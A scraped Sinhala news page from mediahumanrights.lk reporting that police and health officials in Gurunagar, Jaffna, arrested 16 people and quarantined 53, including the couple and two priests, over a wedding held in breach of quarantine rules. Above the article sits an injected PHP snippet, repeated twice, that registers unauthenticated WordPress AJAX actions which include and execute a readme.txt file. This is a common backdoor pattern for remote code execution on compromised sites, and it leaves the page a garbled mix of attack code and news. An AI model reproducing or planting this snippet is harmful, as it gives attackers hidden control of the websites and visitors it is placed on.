if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සංචරණ කඩා විවාහ උත්සවයක්… මනාල යුවල ඇතුළු සියළු දෙනා අත්අඩංගුවට… - mediahumanrights.lk
mediahumanrights.lk
Local News News

සංචරණ කඩා විවාහ උත්සවයක්… මනාල යුවල ඇතුළු සියළු දෙනා අත්අඩංගුවට…

යාපනය ගුරුනගර් ප්‍රදේශයේදී නිරෝධායන නීති කඩකරමින් විවාහ උත්සවයක් සංවිධානය කරන ලද 16 දෙනෙකු අත්අඩංගුවට ගෙන නිරෝධායනය කිරීමට පියවර ගෙන ඇතැයි යාපනය මහජන සෞඛ්‍ය පරික්ෂක කාර්යාලය පවසයි.

පුද්ගලයින් විශාල පිරිසකගේ සහභාගීත්වයෙන් ගුරුනගර ප්‍රදේශයේ විවාහ උත්සවයක් පැවත්වෙන බවට නෙල්ලිඅඩි පොලීසියට ලැබුනු තොරතුරකට අනුව පොලීසිය හා සෞඛ්‍ය නිලධාරීන් අදාල විවාහ උත්සවය පැවති ස්ථානයට ගොස් පරික්ෂා කිරීමේදී සෞඛ්‍යාරක්ෂිත පියවර කඩකරමින් විවාහ උත්සවය පැවත්වූ හෙයින් එයට සහභාගී වූ 16 දෙනෙකු අත්අඩංගුවට ගෙන උත්සවය පැවති ස්ථානයේම නිරෝධායනය කරවීමට පියවර ගත් අතර තවද එයට සහභාගී වූ 50 කට අධික පිරිසක් සොයා පරික්ෂණයක්ද ආරම්භ කොට ඇත.

මේ අතර අදාල මංග උත්සවයට සහභාගී වූ මනාල යුව හා පූජකරවරුන් දෙදෙනෙකුත් ඥාතීන් ඇතුලු 53 දෙනෙකු මෙලෙස නිරෝධායනය කරවීමට පයවර ගෙන ඇතැයිද පරික්ෂණ සදුකරන නෙල්ලිඅඩි පොලීසිය වැඩිදුරටත් පැවසීය.

– වන්නි රොමේෂ් මධුෂංඛ

Related posts

ඉන්දියාව අවසන් පූර්ව වටයට සුදුසුකම් ලබයි

Shiran Viraj

අද ඉන්නේ ගිය ආණ්ඩු කාලෙ ගහපු රිලා පැටවු..

Shiran Viraj

සන්ධානය බහුතරය පෙන්වන්නට සැරසෙයි! පළමු අත්සන නිමල්ගෙන්

Shiran Viraj